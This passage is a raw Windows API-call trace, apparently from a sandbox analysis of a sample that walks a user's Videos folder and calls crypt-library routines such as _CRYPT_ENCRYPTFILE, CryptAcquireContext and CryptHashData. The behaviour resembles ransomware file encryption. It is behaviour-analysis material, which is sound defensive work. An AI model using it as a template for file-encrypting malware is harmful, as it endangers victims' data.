lpString1="cxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tYY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YY6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQ9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="weB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eB5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cn_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JdUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dUcj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ucj7P.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90add8 [0192.377] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0192.378] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0192.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0192.378] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19d0 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0192.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.379] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0192.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0192.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0192.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0192.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0192.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0192.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0192.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.381] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.381] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0192.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0192.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0192.382] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0192.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0192.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.382] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.382] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7559120, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x94e2e2b0, ftLastAccessTime.dwHighDateTime=0x1d5db88, ftLastWriteTime.dwLowDateTime=0x94e2e2b0, ftLastWriteTime.dwHighDateTime=0x1d5db88, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="sQ9weB5Cn_9JdUcj7P.mp4", cAlternateFileName="SQ9WEB~1.MP4")) returned 0x90ae18 [0192.382] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.382] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.382] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.382] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0192.383] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0192.383] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0192.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0192.383] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0192.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0192.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0192.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0192.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0192.384] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0192.384] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.384] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0192.384] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.384] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.384] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.385] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.385] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.385] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0192.385] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0192.386] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.386] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0192.386] CryptHashData (hHash=0x90af58, pbData=0x8df140, dwDataLen=0x19, dwFlags=0x1) returned 1 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0192.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 